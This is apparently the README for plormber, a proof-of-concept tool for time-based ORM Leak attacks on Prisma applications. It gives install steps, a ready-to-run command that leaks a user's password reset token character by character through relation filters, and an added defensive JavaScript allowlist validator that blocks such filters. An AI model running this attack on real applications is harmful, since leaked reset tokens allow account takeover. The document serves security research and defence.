A proof-of-concept tool for exploiting ORM Leak time-based vulnerabilities. The tool's features are currently very limited, but it can be used to quickly implement a time-based ORM Leak attack.

See the accompanying blog article for an overview of how plormber works.
Feel free to fork this project for further development, as long as you acknowledge elttam as the original creators.
- Time-based exploitation of Prisma
- SDK for developing ORM leak exploits
## Virtual environment install

```shell
# For installing to a virtual environment
python3 -m venv venv
source venv/bin/activate
# Install plormber
pip install .
```
## Docker install

```shell
docker compose build
```
## Virtual environment

```shell
plormber --help
```
## Docker

```shell
docker compose run --rm plormber --help
```
## Prisma time-based attack with payloads as arguments

```shell
plormber prisma-contains \
  --chars '0123456789abcdef' \
  --base-query-json '{"query": {PAYLOAD}}' \
  --leak-query-json '{"createdBy": {"resetToken": {"startsWith": "{ORM_LEAK}"}}}' \
  --contains-payload-json '{"body": {"contains": "{RANDOM_STRING}"}}' \
  --verbose-stats \
  https://some.vuln.app/articles/time-based
```
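The command above only works when the target application forwards caller-supplied filter JSON straight into a Prisma `where` clause, including relation filters such as `createdBy.resetToken`. As an added example that is not part of plormber or the accompanying blog article, the following shows the application-side check that closes that path: an allowlist of searchable fields and operators applied before the filter reaches Prisma. The model and field names (`article`, `title`, `body`, `published`) and the handler shape are assumptions, not taken from any real application.

```javascript
// Added example (not part of plormber): allowlist validation for a
// user-supplied Prisma `where` object. A time-based ORM leak needs the
// application to pass caller-controlled filter JSON, relation filters
// included, into a Prisma query unchanged. Restricting the filter to known
// scalar fields and operators removes that path. Schema names are assumed.

// Fields the hypothetical /articles search endpoint is meant to expose and the
// operators each may use. Anything else (relations such as `createdBy`,
// unlisted columns, operators such as `startsWith`) is rejected.
const ALLOWED_FILTERS = {
  title: new Set(['equals', 'contains']),
  body: new Set(['contains']),
  published: new Set(['equals']),
};

const MAX_FILTER_KEYS = 5;

class FilterError extends Error {}

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Validate a caller-supplied filter and return a copy containing only
// allowlisted fields and operators with scalar operands; throws FilterError
// on anything else, so a rejected filter can never reach the ORM.
function sanitizeWhere(userWhere, allowed = ALLOWED_FILTERS) {
  if (!isPlainObject(userWhere)) {
    throw new FilterError('filter must be a JSON object');
  }
  const keys = Object.keys(userWhere);
  if (keys.length > MAX_FILTER_KEYS) {
    throw new FilterError('too many filter fields');
  }
  const safe = {};
  for (const field of keys) {
    const ops = allowed[field];
    if (!ops) {
      // Covers relation traversal (createdBy, author, ...) and unknown columns.
      throw new FilterError(`field not searchable: ${field}`);
    }
    const cond = userWhere[field];
    if (!isPlainObject(cond)) {
      throw new FilterError(`condition for ${field} must be an object`);
    }
    safe[field] = {};
    for (const [op, value] of Object.entries(cond)) {
      if (!ops.has(op)) {
        throw new FilterError(`operator not allowed on ${field}: ${op}`);
      }
      // Operands must be scalars so the sanitized shape stays predictable.
      if (value === null || typeof value === 'object') {
        throw new FilterError(`operand for ${field}.${op} must be a scalar`);
      }
      safe[field][op] = value;
    }
  }
  return safe;
}

// Vulnerable pattern (hypothetical handler, shown for contrast): the caller's
// JSON becomes the query's `where` unchanged.
//   const articles = await prisma.article.findMany({ where: req.body.query });
//
// Hardened pattern: only the sanitized copy reaches Prisma.
//   const articles = await prisma.article.findMany({
//     where: sanitizeWhere(req.body.query),
//   });

// Verdict form of the same check, convenient for logging rejected filters as a
// detection signal (repeated rejections from one client are worth alerting on).
function checkWhere(userWhere) {
  try {
    return { ok: true, where: sanitizeWhere(userWhere) };
  } catch (e) {
    if (e instanceof FilterError) return { ok: false, reason: e.message };
    throw e;
  }
}

// Constructed inputs: a legitimate search and the relation filter shape the
// command above would send.
console.log(checkWhere({ title: { contains: 'orm' } }));
console.log(checkWhere({ createdBy: { resetToken: { startsWith: 'a' } } }));
```

The allowlist is deliberately per field and per operator rather than a denylist of relation names: a new relation added to the schema later is rejected by default instead of becoming a fresh leak.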
See CUSTOM_ATTACKS.md for documentation about implementing custom plormber attacks.
- More exploitation methods.
- Burp Suite plugin